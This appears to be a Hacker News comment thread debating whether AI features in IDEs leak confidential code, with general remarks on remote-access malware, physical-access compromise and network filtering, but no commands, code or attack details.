It seems every IDE now has AI built-in. That's a problem if you're working on highly confidential code. You never know when the AI is going to upload code snippets to the server for analysis.
Not trying to be mean but I would expect comments on HN on these kind of stories to be from people who have used AI in IDEs at this point. There is no AI integration that runs automatically on a codebase.
This is HN. 10 years ago that would be true, but now I expect 99% of commenters to have newer used the thing they are talking about or used it once 20 years ago for 10 minutes, or even nkt read the article.
They both support it via plugins. Xcode doesn’t enable it by default, you need to enable it and sign into an account. It’s not really all that different.
What commonly gets installed in those cases is actual malware, a RAT (Remote Admin Tool) that lets the attacker later run commands on your laptop (kinda like an OpenSSH server, but also punching a hole through nat and with a server that they can broadcast commands broadly to the entire fleet).
If the attacker wants to use AI to assist in looking for valuables on your machine, they won't install AI on your machine, they'll use the remote shell software to pop a shell session, and ask AI they're running on one of their machines to look around in the shell for anything sensitive.
If an attacker has access to your unlocked computer, it is already game over, and LLM tools is quite far down the list of dangerous software they could install.
Maybe we should ban common RAT software first, like `ssh` and `TeamViewer`.
They could install anything. Including Claude Code and then run it in background as agent to exfiltrate data. I'm a security professional. This is unacceptable
I think the parent commenter was pointing out that, instead of installing Claude Code, they could just install actual malware. It's like that phrase Raymond Chen always uses: "you're already on the other side of the airtight hatchway."
Isn't the general advice that if malware has been installed specifically due to physical access, then the entire machine should be considered permanently compromised? That is to say, if someone has access to your unlocked machine, I've heard that it's way too late for MalwareBytes to be reliable....
This is not a realistic concern. If you're working on highly confidential code (in a serious meaning of that phrase), your while environment is already either offline or connecting only through a tightly controlled corporate proxy. There's no accidental leaks to AI from those environments.
The right middle ground is running Little Snitch in alert mode. The initial phase of training the filters and manually approving requests is painful, but it's a lot better than an air gap.
There are ranges of security concerns and high confidentiality.
For most corporate code (that is highly confidential) you still have proper internet access, but you sure as hell can't just send your code to all AI providers just because you want to, just because it's built into your IDE.
There is a gulf and many shades between "this code should never be on an internet-connected device" and "it doesn't matter if this code is copied everywhere by absolutely anyone".